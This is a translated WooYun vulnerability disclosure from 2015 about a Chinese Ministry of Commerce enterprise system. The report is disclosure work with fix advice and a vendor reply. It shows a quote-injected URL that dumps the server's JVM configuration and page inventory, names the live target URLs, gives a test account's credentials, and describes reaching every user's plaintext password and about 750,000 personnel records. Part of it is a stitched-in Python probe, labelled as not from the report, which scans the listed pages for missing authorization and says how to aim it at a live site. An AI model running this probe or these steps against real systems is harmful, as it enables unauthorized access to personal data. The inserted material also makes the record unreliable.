
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0106874

Title: Improper design in a system under the Ministry of Commerce allows disclosure of internal system information

Related vendor: CNCERT (national internet emergency response center)

Author: 路人甲 (anonymous)

Submitted: 2015-04-10 17:54

Fixed: 2015-05-29 18:32

Published: 2015-05-29 18:32

Type: design flaw / logic error

Severity: high

Self-assessed rank: 15

Status: handed over to a third-party partner organization (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]




Vulnerability details

Disclosure status:

2015-04-10: Details sent to the vendor, awaiting vendor handling
2015-04-14: Vendor confirmed; details visible to the vendor only
2015-04-24: Details disclosed to core white hats and relevant domain experts
2015-05-04: Details disclosed to regular white hats
2015-05-14: Details disclosed to intern white hats
2015-05-29: Details disclosed to the public

Brief description:

You first have to register an account on the home page; only then does the following apply:
A design flaw leaks internal paths (the framework's error page dumps JVM properties and the full page inventory), which leads to privilege escalation and then to information disclosure: the plaintext passwords of every enterprise registered in the system, plus the data those enterprises have reported, e.g. about 750,000 personnel records in total.

Detailed description:

Target:
http://fwwbqy.fwmys.mofcom.gov.cn/

[Screenshot: QQ截图20150409152141.png]


Register an account through the system's registration function.

[Screenshot: QQ截图20150409152408.png]


In the "registration location" picker of the form you get a link like this one:

http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbZoneInfoPopList_$DirectLink_2.html?session=T&sp=S00&sp=S


Actually I wanted to try for injection, so I appended a single quote to the sp parameter:
http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbZoneInfoPopList_$DirectLink_2.html?session=T&sp=S00'&sp=S
Then you find that the server answers with its unhandled-exception page, which dumps a pile of information.

[Screenshot: QQ截图20150409152614.png]


Look closely at what is in there.

[Screenshot: QQ截图20150409152717.png]


There may well be an injection here too, but my manual injection skills are poor, so I did not try. What the error page reveals instead is the complete JVM and Tomcat configuration of the host (note that Tomcat runs as root from /usr/local/ciecc/appsvr):

catalina.base /usr/local/ciecc/appsvr/apache-tomcat-6.0.29 
catalina.home /usr/local/ciecc/appsvr/apache-tomcat-6.0.29
catalina.useNaming true
common.loader ${catalina.base}/lib,${catalina.base}/lib/*.jar,${catalina.home}/lib,${catalina.home}/lib/*.jar
file.encoding GB18030
file.encoding.pkg sun.io
file.separator /
jasper.reports.compile.class.path /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/webapps/ROOT/WEB-INF/lib/jasperreports-0.5.2.jar
/usr/local/ciecc/appsvr/apache-tomcat-6.0.29/webapps/ROOT/WEB-INF/classes
jasper.reports.compile.temp /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/webapps/ROOT/reports
java.awt.graphicsenv sun.awt.X11GraphicsEnvironment
java.awt.printerjob sun.print.PSPrinterJob
java.class.path /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/bin/bootstrap.jar
java.class.version 50.0
java.endorsed.dirs /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/endorsed
java.ext.dirs /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/ext:/usr/java/packages/lib/ext
java.home /usr/local/ciecc/appsvr/jdk1.6.0_23/jre
java.io.tmpdir /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/temp
java.library.path /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/i386/server
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/i386
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/../lib/i386
/usr/java/packages/lib/i386
/lib
/usr/lib
java.naming.factory.initial org.apache.naming.java.javaURLContextFactory
java.naming.factory.url.pkgs org.apache.naming
java.runtime.name Java(TM) SE Runtime Environment
java.runtime.version 1.6.0_23-b05
java.specification.name Java Platform API Specification
java.specification.vendor Sun Microsystems Inc.
java.specification.version 1.6
java.util.logging.config.file /usr/local/ciecc/appsvr/apache-tomcat-6.0.29/conf/logging.properties
java.util.logging.manager org.apache.juli.ClassLoaderLogManager
java.vendor Sun Microsystems Inc.
java.vendor.url http://java.sun.com/
java.vendor.url.bug http://java.sun.com/cgi-bin/bugreport.cgi
java.version 1.6.0_23
java.vm.info mixed mode
java.vm.name Java HotSpot(TM) Server VM
java.vm.specification.name Java Virtual Machine Specification
java.vm.specification.vendor Sun Microsystems Inc.
java.vm.specification.version 1.0
java.vm.vendor Sun Microsystems Inc.
java.vm.version 19.0-b09
line.separator
os.arch i386
os.name Linux
os.version 2.6.9-11.19AXsmp
package.access sun.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.,sun.beans.
package.definition sun.,java.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.
path.separator :
server.loader
shared.loader
sun.arch.data.model 32
sun.boot.class.path /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/resources.jar
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/rt.jar
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/sunrsasign.jar
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/jsse.jar
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/jce.jar
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/charsets.jar
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/modules/jdk.boot.jar
/usr/local/ciecc/appsvr/jdk1.6.0_23/jre/classes
sun.boot.library.path /usr/local/ciecc/appsvr/jdk1.6.0_23/jre/lib/i386
sun.cpu.endian little
sun.cpu.isalist
sun.io.unicode.encoding UnicodeLittle
sun.java.launcher SUN_STANDARD
sun.jnu.encoding GB18030
sun.management.compiler HotSpot Tiered Compilers
sun.os.patch.level unknown
tomcat.util.buf.StringCache.byte.enabled true
user.country CN
user.dir /
user.home /root
user.language zh
user.name root
user.timezone GMT+08:00


Next, the same page lists every page and component template the application has loaded (each path followed by a number), which gives you a complete map of suspicious links to try:

context:/pages/org/NwbFullBankEdit.html	65
context:/pages/corp/NwbAuditCorpAuthEdit.html 248
context:/pages/jour/NwbAuditHistoryList.html 21
context:/pages/corp/NwbModifyHistoryEdit.html 52
context:/pages/corp/NwbCorpAuthEdit.html 239
context:/pages/cont/NwbRecConsList.html 158
context:/pages/news/city/tianjin.html 1
context:/pages/information/DeptList.html 94
context:/pages/information/NwbAllDeptInfoPopList.html 58
context:/pages/licence/NwbAuditLicInfoList.html 129
context:/pages/licence/NwbLicInfoView.html 154
context:/pages/report/ReportCorp.html 27
context:/pages/cont/NwbConExecInfoPopEdit.html 115
context:/pages/corp/NwbFileCorpView.html 93
context:/pages/news/DeptWindowList.html 53
context:/pages/corp/NwbNewPeopleView.html 65
context:/pages/train/NwbFullBankEdit.html 89
context:/pages/information/PasswordEdit3.html 38
context:/pages/corp/NotPassCorpAuthEdit.html 221
context:/pages/news/RecWbMessageList2.html 85
context:/pages/information/ShowZoneCodeList.html 36
context:/pages/Ajax.html 2
context:/components/TiebaBorder.html 54
context:/pages/org/OrgUserEdit.html 54
context:/pages/cont/ReceiveprintStub.html 50
context:/pages/train/corp/TrainCorpList.html 306
context:/pages/cont/NwbDahuiConsList.html 32
context:/pages/NwbAnnounceList.html 66
context:/pages/information/PasswordEdit.html 41
context:/pages/corp/NwbPeopleInfoEdit.html 148
context:/pages/corp/NwbFileCorpEdit.html 216
context:/pages/news/city/dalian.html 1
context:/pages/cont/NwbAuditContChangeList.html 178
context:/pages/cont/ReportRecCons.html 68
context:/pages/Page.html 30
context:/pages/train/corp/Trainview.html 190
context:/components/RecCorpInfoBorder.html 80
context:/pages/cont/NwbRecConsAdd.html 189
context:/pages/org/NwbOrgInfoList.html 117
context:/pages/corp/NwbFullBankList.html 132
context:/pages/train/org/TrainHistoryCorpList.html 133
context:/pages/cont/NwbAuditConsEdit.html 246
classpath:/org/apache/tapestry/html/RequestDisplay.html 23
classpath:/org/apache/tapestry/pages/Exception.html 22
classpath:/org/apache/tapestry/pages/StaleSession_zh.html 8
context:/pages/train/corp/Trainedit.html 207
context:/pages/report/QueryReportCustomCorp.html 70
context:/pages/corp/NwbCorpAuthView.html 205
context:/pages/questions.html 1
context:/pages/corp/NwbAuditNewPeopleList.html 113
context:/pages/query/NwbQueryCustomEdit.html 82
context:/pages/lad/NwbLadCorpFileList.html 60
context:/pages/information/DeptUserAdd.html 76
context:/pages/report/QueryReportCustom.html 57
context:/pages/corp/NwbNewPeopleList.html 113
context:/pages/corp/NwbCorpInfoEdit.html 190
context:/pages/KfPassWord.html 69
context:/pages/news/city/nanjing.html 1
context:/pages/news/city/jinan.html 1
context:/pages/train/org/TrainPrint.html 56
context:/components/LadBorder.html 136
context:/pages/cont/Receiveprint.html 50
context:/components/OrgBorder.html 212
classpath:/org/apache/tapestry/pages/StaleSession.html 9
context:/pages/coin/NwbCoinRateExcEdit.html 28
context:/pages/corp/NwbModifyHistoryEditView.html 26
context:/pages/corp/NwbAuditPeopleInfoEdit.html 154
context:/pages/corp/NotPassCorpInfoEdit.html 190
context:/pages/corp/NwbRecCorpInfoCheckList.html 76
context:/pages/report/QueryReport.html 75
context:/pages/tieba/NwbTiebaReviewList.html 37
context:/pages/information/QueryZoneList.html 83
context:/rbac/CasLogin.html 0
context:/pages/tieba/NwbTiebaFloorList.html 53
context:/pages/DeptAjaxInfo.html 2
context:/pages/information/NwbCountryPopList.html 37
context:/pages/corp/NwbCorpAuthList.html 87
context:/pages/report/Report.html 284
classpath:/com/cofortune/framework/web/ui/paging/PageNavigation.html 110
context:/pages/lad/NwbLadTrainList.html 143
context:/pages/CorpIndex.html 74
context:/pages/corp/NwbAuditModifyHistoryEdit.html 77
context:/pages/AjaxSession.html 2
context:/pages/corp/NwbAuditCorpInfoEdit.html 444
context:/rbac/auth/Logout.html 1
context:/pages/information/DeptEdit.html 68
context:/pages/news/RecWbMessageList.html 86
context:/pages/train/NwbAuditTrainList.html 248
context:/pages/train/corp/TrainHistoryCorpList.html 133
context:/pages/information/DeptShow.html 19
context:/pages/corp/NwbAuditCorpInfoList.html 180
context:/pages/corp/NwbRecCorpInfoCheckEdit.html 36
context:/pages/corp/AjaxRecCorpCodeCheck.html 2
context:/pages/train/TrainHistoryCorpList.html 124
context:/pages/corp/NwbModifyCorpInfoEditAndMoList.html 74
context:/pages/licence/NwbLicInfoList.html 117
context:/pages/cont/NwbRecConsEdit.html 149
context:/pages/NwbUserProfileConfig.html 15
context:/components/TishiBorder.html 59
context:/rbac/auth/Exception.html 4
context:/pages/news/NewsShow.html 34
context:/pages/org/NwbOrgInfoEdit2.html 92
context:/Home.html 4
context:/pages/coin/NwbCoinRateList.html 64
context:/pages/org/NwbOrgInfoEdit.html 59
context:/pages/information/DeptUserList.html 62
context:/pages/question/NwbQuestionDeptList.html 30
context:/pages/corp/NwbAuditPeopleInfoView.html 108
context:/pages/DeptIndex.html 339
context:/pages/corp/NwbRecCorpInfoEdit.html 187
context:/pages/cont/NwbAuditBatchConsList.html 161
context:/components/CorpBorder.html 251
context:/pages/org/NwbFullBankList.html 124
context:/pages/information/ModifyDeptInfo.html 61
context:/pages/corp/NwbModifyHistoryList.html 113
context:/pages/cont/NwbAuditBatchConExecInfoList.html 170
context:/pages/report/NwbReportWzAllTotalCorp.html 94
context:/pages/org/NwbFileOrgInfoList.html 73
context:/pages/corp/NwbFileCorpInfoList.html 84
context:/pages/news/city/xiamen.html 1
context:/pages/corp/NwbAuditModifyHistoryList.html 152
context:/pages/corp/NwbAuditPeopleInfoList.html 135
context:/pages/cont/NwbRecConsLoadExecList.html 141
context:/rbac/auth/Login.html 88
context:/pages/question/NwbQuestionCorpView.html 384
context:/pages/corp/NwbFullBankEdit.html 65
context:/pages/question/NwbQuestionDeptEdit.html 467
context:/pages/cont/AjaxConsCodeCheck.html 2
context:/pages/cont/NwbAuditConsList.html 197
context:/pages/query/NwbQueryCustomList.html 60
context:/pages/query/NwbQueryCustomQuery.html 86
context:/pages/tieba/NwbTiebaTitleList.html 32
context:/pages/cont/NwbAuditConExecInfoList.html 356
context:/pages/train/QueryTrainReport.html 67
context:/pages/corp/NwbModifyCorpInfoList.html 95
classpath:/org/apache/tapestry/pages/StaleLink.html 12
context:/pages/question/NwbQuestionCorpList.html 30
context:/pages/information/PasswordEdit2.html 38
context:/pages/corp/NwbPeopleInfoView.html 108
context:/components/AppBorder.html 244
context:/pages/news/base/tianjin.html 1
context:/pages/news/city/wuhan.html 1
context:/pages/corp/NwbRecCorpAuthEdit.html 218
context:/pages/cont/NwbAuditContChangeEdit.html 73
context:/pages/query/NwbQueryCustomTemplateList.html 45
context:/components/KfBorder.html 104
context:/pages/corp/NwbFullBankView.html 39
context:/pages/cont/NwbRecConsPrint.html 126
context:/pages/org/ShowWbOrgInfo.html 33
context:/pages/news/ShowRecMessage.html 33
context:/pages/corp/NwbRecPeopleInfoEdit.html 121
context:/pages/train/NwbFullBankList.html 124
context:/pages/train/org/Trainview.html 208
context:/pages/corp/NwbCorpJfzxPopList.html 83
context:/pages/AjaxAuto.html 2
context:/pages/cont/NwbConsFwwbTongji.html 52
context:/pages/news/city/chengdu.html 1
context:/pages/train/NwbFullBankView.html 42
context:/pages/corp/NotPassPeopleInfoEdit.html 121
context:/pages/corp/RecCorpInfoMsg.html 32
context:/pages/corp/NwbNewPeopleEdit.html 106
context:/pages/cont/Tishi.html 54
context:/rbac/auth/SessionTimeOut.html 8
classpath:/com/cofortune/framework/web/ui/paging/OrderColumn.html 17
classpath:/org/apache/tapestry/html/ExceptionDisplay.html 47
context:/pages/corp/NwbAuditCorpAuthList.html 132
context:/pages/corp/NwbPeopleInfoList.html 87
context:/pages/org/OrgUserList.html 63
context:/pages/corp/NwbAuditCorpAuthView.html 205
context:/pages/org/NwbFullBankView.html 39
context:/pages/question/NwbQuestionCorpEdit.html 387
context:/pages/report/QueryReportLic.html 36
context:/components/PopBorder.html 68
context:/pages/Qbs.html 120
context:/pages/OrgIndex.html 27
context:/pages/train/org/TrainCorpList.html 302
context:/pages/information/CorpUserList.html 41
context:/pages/news/base/shanghai.html 1
context:/pages/news/SendWbMessageList.html 78
context:/pages/cont/NwbContChangePopEdit.html 78
context:/pages/report/NwbReportWzEndTotalCorp.html 94
context:/pages/news/NwbMessageEdit.html 55
context:/pages/org/NwbFileOrgEdit.html 189
context:/pages/information/NwbZoneInfoPopList.html 96
context:/pages/cont/NwbAuditConExecInfoEdit.html 150
context:/pages/corp/NotPassCorpInfo.html 56


Then back to the beginning: let us register an account. Registration here requires approval, but before the approval goes through the account can already log in, so we can go on to try privilege escalation.
I registered this account:
Account: 0502595596180
Password: 0502595596180

[Screenshot: QQ截图20150409165033.png]

Proof of vulnerability:

After logging in with the unapproved account, I found several pages that are reachable beyond its privileges:

http://fwwbqy.fwmys.mofcom.gov.cn/pages/corp/NwbFileCorpEdit.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/news/NewsList.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/CorpUserList.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbCorpUserAdd.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/KfPassWord.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/data/NfwwbStaStatusList.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/Qbs.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/OrgIndex.html
http://fwwbqy.fwmys.mofcom.gov.cn/pages/tieba/NwbTiebaTitleList.html

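The two steps above (reading the framework's exception dump, then checking which of the listed pages an unapproved account can open) are mechanical enough to script. The helper below is an added example, not code from the report or from the site; it parses a constructed sample of the dump (values copied from the report, the line layout is an assumption), extracts the host facts and the application's own page paths, and probes each path through a fetch callback so the module runs offline against a fake site. The login marker `/rbac/auth/Login.html`, the fake host name and the "privileged-looking" name fragments are assumptions for illustration.

```python
"""Added helper, not part of the original report: parse a Tapestry-style
exception dump (JVM properties plus the page-template inventory) and then
probe every discovered page with a low-privilege session to find the ones
that render without an authorization check. Network access sits behind a
fetch callback so the module runs offline against a constructed fake site."""
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample of the exception-page text. Values are taken from the
# report; the exact line layout is an assumption.
SAMPLE_DUMP = """\
catalina.base /usr/local/ciecc/appsvr/apache-tomcat-6.0.29
java.version 1.6.0_23
user.name root
user.home /root
os.version 2.6.9-11.19AXsmp
context:/pages/information/CorpUserList.html 41
context:/pages/KfPassWord.html 69
context:/pages/corp/NwbFileCorpEdit.html 216
context:/pages/corp/NwbAuditCorpInfoEdit.html 444
context:/rbac/auth/Login.html 88
classpath:/org/apache/tapestry/pages/Exception.html 22
classpath:/org/apache/tapestry/html/ExceptionDisplay.html 47
"""

PROP_RE = re.compile(r"^([A-Za-z][\w.]*) +(\S.*)$")
TEMPLATE_RE = re.compile(r"^(context|classpath):(/\S+\.html)\s+\d+$")
# Property keys that describe the host rather than the application.
HOST_PROPS = ("user.name", "user.home", "catalina.base", "java.io.tmpdir",
              "os.version", "java.version")
# Name fragments that usually mark audit/admin pages (assumption): probe first.
PRIV_HINTS = ("Audit", "Dept", "Org", "PassWord", "UserList", "UserAdd", "Edit")


def parse_dump(text: str) -> Tuple[Dict[str, str], List[str]]:
    """Split the dump into {property: value} and the app's own page paths."""
    props: Dict[str, str] = {}
    pages: List[str] = []
    for line in text.splitlines():
        t = TEMPLATE_RE.match(line)
        if t:
            if t.group(1) == "context":  # skip framework templates on the classpath
                pages.append(t.group(2))
            continue
        p = PROP_RE.match(line)
        if p:
            props[p.group(1)] = p.group(2)
    return props, pages


def is_tapestry_exception_page(text: str) -> bool:
    """Cheap fingerprint: framework exception templates or JVM properties echoed back."""
    return ("org/apache/tapestry/pages/Exception.html" in text
            or ("catalina.base" in text and "java.version" in text))


def leaked_host_facts(props: Dict[str, str]) -> Dict[str, str]:
    """Only the properties worth reporting as a host-information leak."""
    return {k: props[k] for k in HOST_PROPS if k in props}


def prioritize(pages: List[str]) -> List[str]:
    """Likely-privileged pages first, then the rest; order kept inside each group."""
    hot = [p for p in pages if any(h in p for h in PRIV_HINTS)]
    return hot + [p for p in pages if p not in hot]


Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status, body)


def probe_pages(base: str, pages: List[str], fetch: Fetcher,
                login_marker: str = "/rbac/auth/Login.html") -> Dict[str, List[str]]:
    """Classify each page as reachable/denied/error for the session behind `fetch`.
    A 200 whose body still references the login page is a login form rendered
    in place (common in Tapestry apps) and counts as denied, not reachable."""
    out: Dict[str, List[str]] = {"reachable": [], "denied": [], "error": []}
    for path in prioritize(pages):
        if path.endswith(login_marker):
            continue
        status, body = fetch(base + path)
        if status == 200 and login_marker not in body:
            out["reachable"].append(path)
        elif status in (200, 302, 401, 403):
            out["denied"].append(path)
        else:
            out["error"].append(path)
    return out


# Constructed fake site standing in for an unapproved account's session: the
# pages the report names as reachable render, the audit page bounces to login.
FAKE_BASE = "http://fake.invalid"
FAKE_SITE = {
    "/pages/information/CorpUserList.html": (200, "<table>user,password</table>"),
    "/pages/KfPassWord.html": (200, "<form>reset</form>"),
    "/pages/corp/NwbFileCorpEdit.html": (200, "<form>corp file</form>"),
    "/pages/corp/NwbAuditCorpInfoEdit.html": (200, '<a href="/rbac/auth/Login.html">'),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    """Offline stand-in for an HTTP GET with the low-privilege session cookie."""
    return FAKE_SITE.get(url[len(FAKE_BASE):], (500, ""))


if __name__ == "__main__":
    props, pages = parse_dump(SAMPLE_DUMP)
    print("host facts:", leaked_host_facts(props))
    print(probe_pages(FAKE_BASE, pages, fake_fetch))
```

Against a live target you would replace `fake_fetch` with a function that performs the GET with the unapproved account's session cookie, and feed `parse_dump` the full error-page text; the classification then tells you directly which pages lack a server-side authorization check.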

Among them:
http://fwwbqy.fwmys.mofcom.gov.cn/pages/news/NewsList.html allows system news to be added, modified and deleted.

[Screenshot: QQ截图20150409165351.png]


http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/CorpUserList.html
shows the account name and password of every user registered in the system.

[Screenshot: QQ截图20150409165435.png]


Another page shows the same thing:
http://fwwbqy.fwmys.mofcom.gov.cn/pages/KfPassWord.html

[Screenshot: QQ截图20150409165538.png]


Accounts can also be disabled from there.
Next, the personnel information of all enterprises can be viewed (750,000 records): http://fwwbqy.fwmys.mofcom.gov.cn/pages/train/NwbTrainCardNoList.html

[Screenshot: QQ截图20150409165804.png]


Taking 浪潮集团山东通用软件有限公司 (Inspur Group Shandong General Software Co., Ltd.) as an example:

[Screenshot: QQ截图20150409170121.png]


Because going further would require a save operation, I did not interfere with that enterprise's data-reporting work.
For this company we can obtain the following information (the tabs of its record):

Contract information | Outsourcing-receipt list | Data statistics | Human resources | Enterprise certification | Funding declaration | Personnel training | International certification | Attachment upload | Funds-received information | Enterprise information | Enterprise information | Registration location and reviewing-department modification | Newly hired personnel information | User information

Fix recommendation:

Control permissions: enforce authorization server-side on every page, not just in the menu, and do not let unapproved accounts log in. Separately, stop serving the framework's default exception page, since it exposes the host configuration and the page inventory that made this escalation easy to find.

Copyright notice: when reposting, credit the source as 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: high

Vulnerability rank: 11

Confirmed: 2015-04-14 18:30

Vendor reply:

CNVD did not directly reproduce the described situation; the report has been forwarded via CNCERT to the national superior information-security coordination body, which will coordinate handling with the unit operating the site.

Latest status:

None yet